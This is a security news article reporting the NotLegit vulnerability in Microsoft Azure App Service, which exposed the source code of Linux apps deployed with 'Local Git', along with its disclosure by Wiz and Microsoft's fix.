Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

A flaw in Microsoft Azure App Service exposes customer source code

A vulnerability in the Microsoft Azure App Service led to the exposure of customer source code for at least four years. Early this month, Microsoft has notified a small group of Azure customers that have been impacted by a recently discovered bug, dubbed NotLegit, that exposed the source code of their Azure web apps since at […]

Microsoft azure app service alert

A vulnerability in the Microsoft Azure App Service led to the exposure of customer source code for at least four years.

Early this month, Microsoft has notified a small group of Azure customers that have been impacted by a recently discovered bug, dubbed NotLegit, that exposed the source code of their Azure web apps since at least September 2017.

Microsoft azure app service alert

The NotLegit vulnerability was likely exploited by threat actors in attacks in the wild.

The flaw was discovered by researchers from the Wiz Research Team, it is insecure default behavior in the Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”.

The vulnerability was discovered by security firm Wiz, which reported the bug to Microsoft in September. The issue was fixed in November.

The vulnerability resides in Azure App Service, which is a cloud platform for hosting websites and web applications.

Azure supports multiple methods to deploy source code and artifacts to the Azure App service, including the “Local Git”. The “Local Git” allows developers to initiate a local Git repository within the Azure App Service container that enables them to push their code straight to the server.

Only customers that selected the “Local Git” option to deploy their websites from a Git repository hosted on the same Azure server were impacted and their source code was also exposed online.

Every PHP, Node, Ruby, and Python application deployed on Linux-based Azure servers using this method was impacted. Apps hosted on Windows Server systems were not impacted.

“MSRC was informed by Wiz.io, a cloud security vendor, under Coordinated Vulnerability Disclosure (CVD) of an issue where customers can unintentionally configure the .git folder to be created in the content root, which would put them at risk for information disclosure. This, when combined with an application configured to serve static content, makes it possible for others to download files not intended to be public.” reads the advisory published by Microsoft.

Wiz Research Team speculates the attack was exploited in the wild. The experts deployed a vulnerable Azure App Service app, linked it to an unused domain, and within four days they saw the first attempts made by threat actors to access the contents of the exposed source code folder.

Microsoft fixed the issue by updating all PHP images to disallow serving the .git folder as static content as a defense in-depth measure.

The IT giant granted Wiz a $7,500 bounty for reporting this flaw, and the security firm has announced that it plans to donate the reward.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, azure app service)

[adrotate banner=”5″]

[adrotate banner=”13″]